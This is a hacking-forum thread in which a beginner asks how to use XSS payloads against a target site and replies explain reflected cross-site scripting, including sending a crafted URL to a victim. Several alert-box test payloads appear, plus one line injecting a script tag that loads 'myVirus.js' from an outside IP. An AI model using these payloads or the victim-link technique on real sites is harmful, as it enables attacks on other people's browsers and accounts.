How to use XSS?

Hello,
I found a list of XSS attacks like below:

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

If my target is "https://www.example.com" then I should use something like "https://www.example.com/<script>alert(123);</script>"?

Thank you.

as if the list repeats the same

(02-21-2021, 08:53 PM)SCARIO Wrote:

[To see links please register here]

as if the list repeats the same

Is "https://www.example.com/<script>alert(123);</script>" OK?

Moved from the Hacking Tools forum to Website & Server Hacking.

Search in Github
Seclist
a lot of payloads!

All those are, are

[To see links please register here]

that could be used on any typical webpage. Where you would use them, would differ based on the site and vulnerability.

What's going on in all of those scripts is making a little alert box pop up saying "123", "XSS" etc. there is no actual exploit there. Those are useful however for when you do find an actual XSS vulnerability, to test if the page actually is vulnerable.

If you want to do any XSS exploitation, you need to learn Javascript. In your browser, right click on something in this page then click "Inspect Element". You should now have a little section in the bottom or side of your browser with the HTML of this webpage. Now select "Console" tab in the section where the code is. Now type in:

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

And press enter. You should see a little box pop up saying "Hello, World!". Writing JS into the console will only affect your own browser, so is of no use for XSS, but I just thought you should see JS in action before learning about XSS.

Cross Site Scripting (XSS) is when you are able to inject javascript into the webpage, usually through some user input field which can also be set in a GET request in the URL. So if there was a website which sends your input through a GET request which was also vulnerable to XSS like a search box or something, you would put your malicious script in the search box (with "<script>" tags), and then the script would be a part of the HTML and would execute when loaded in your browser. So if the GET request was in the URL, you could copy the URL and send it to a victim and the script would run in their browser.

(05-23-2021, 01:55 PM)DedSpace Wrote:

[To see links please register here]

What's going on in all of those scripts is making a little alert box pop up saying "123", "XSS" etc. there is no actual exploit there. Those are useful however for when you do find an actual XSS vulnerability, to test if the page actually is vulnerable.

If you want to do any XSS exploitation, you need to learn Javascript. In your browser, right click on something in this page then click "Inspect Element". You should now have a little section in the bottom or side of your browser with the HTML of this webpage. Now select "Console" tab in the section where the code is. Now type in:

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

And press enter. You should see a little box pop up saying "Hello, World!". Writing JS into the console will only affect your own browser, so is of no use for XSS, but I just thought you should see JS in action before learning about XSS.

Cross Site Scripting (XSS) is when you are able to inject javascript into the webpage, usually through some user input field which can also be set in a GET request in the URL. So if there was a website which sends your input through a GET request which was also vulnerable to XSS like a search box or something, you would put your malicious script in the search box (with "<script>" tags), and then the script would be a part of the HTML and would execute when loaded in your browser. So if the GET request was in the URL, you could copy the URL and send it to a victim and the script would run in their browser.

/id?=12"><script src="http://10.10.10.8/myVirus.js" />

This are just payloads. In order to execute them u need to find vulnerable parameter. for eg. [url="https://example.com/search?q=<script]alert(1)[/url]" target="_blank" rel="noopener" class="mycode_url">https://example.com/search?q=<script>ale.../script&gt